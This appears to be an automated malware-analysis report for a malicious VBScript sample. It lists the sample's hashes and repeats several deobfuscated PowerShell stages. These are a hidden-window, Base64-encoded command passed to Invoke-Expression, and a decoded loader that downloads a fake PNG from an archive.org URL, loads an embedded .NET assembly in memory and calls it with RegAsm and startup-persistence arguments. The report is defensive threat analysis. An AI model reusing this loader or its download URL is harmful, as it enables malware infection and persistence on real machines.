Malicious
Malicious

95bf9a3d79496b9061d703aa625daa7d

VBScript
|
MD5: 95bf9a3d79496b9061d703aa625daa7d
|
Size: 74.58 KB
|
text/vbscript

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
95bf9a3d79496b9061d703aa625daa7d
Sha1
633aa0176cc6cc554d2ae68b6a1addd184968dbd
Sha256
a8366bc01f3cdc7c41a5d08ef5e34bf8c6888e205f0c70892e7fa5a1bde2a3bb
Sha384
7cbd155756f6440a120afcd00ceac5ae2605914b47d23f22b9b398c87ce819f9ae631ae1bdbbde88537db0230f4ca1a0
Sha512
37d30febc0e7736aea7404510daa15cdf33c8305cfd22abf9772d540c60dcbc26172c84eb81da70a4e2e166d5c91c93fd7370d1fe8fb7fc7454e5da7149e0d1d
SSDeep
1536:wm2Nnl280fQP5973X7KG0XCmrSMz6MMwLw0f0BWwKPjWlfx06N6UY4wKo/pEjsBX:gl28UQP5hX7KG0XCmrSMz6MMwLw0f0BI
TLSH
2573A3B9B7866A201920F09DBEBD6349DD09C3B4F04E4EB46F019D2F6620C45FD2967E
Artefacts
Name
Value
URLs in VB Code - #1

http://www.ostrosoft.com/smtp.html

Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgxNC9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression"

Deobfuscated PowerShell

Invoke-Expression

Deobfuscated PowerShell

Invoke-Expression

Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250814/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } ))

Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgxNC9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression"

Deobfuscated PowerShell

Invoke-Expression

Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250814/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } ))

95bf9a3d79496b9061d703aa625daa7d (74.58 KB)
No malware configuration were found at this point.
Artefacts
Name
Value Location
URLs in VB Code - #1

http://www.ostrosoft.com/smtp.html

95bf9a3d79496b9061d703aa625daa7d

Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgxNC9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression"

Malicious

95bf9a3d79496b9061d703aa625daa7d > 95bf9a3d79496b9061d703aa625daa7d.deobfuscated.vbs > [Command #0]

Deobfuscated PowerShell

Invoke-Expression

Malicious

95bf9a3d79496b9061d703aa625daa7d > 95bf9a3d79496b9061d703aa625daa7d.deobfuscated.vbs > [Command #0] > [PowerShell Command]

Deobfuscated PowerShell

Invoke-Expression

Malicious

95bf9a3d79496b9061d703aa625daa7d > 95bf9a3d79496b9061d703aa625daa7d.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS]

Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250814/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } ))

Malicious

95bf9a3d79496b9061d703aa625daa7d > 95bf9a3d79496b9061d703aa625daa7d.deobfuscated.vbs > [Command #0] > [Base64-Block]

Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgxNC9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression"

Malicious

95bf9a3d79496b9061d703aa625daa7d > 95bf9a3d79496b9061d703aa625daa7d.deobfuscated.vbs > [Command #0] > [Deobfuscated PS]

Deobfuscated PowerShell

Invoke-Expression

Malicious

95bf9a3d79496b9061d703aa625daa7d > 95bf9a3d79496b9061d703aa625daa7d.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command]

Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250814/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } ))

Malicious

95bf9a3d79496b9061d703aa625daa7d > 95bf9a3d79496b9061d703aa625daa7d.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS]

You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙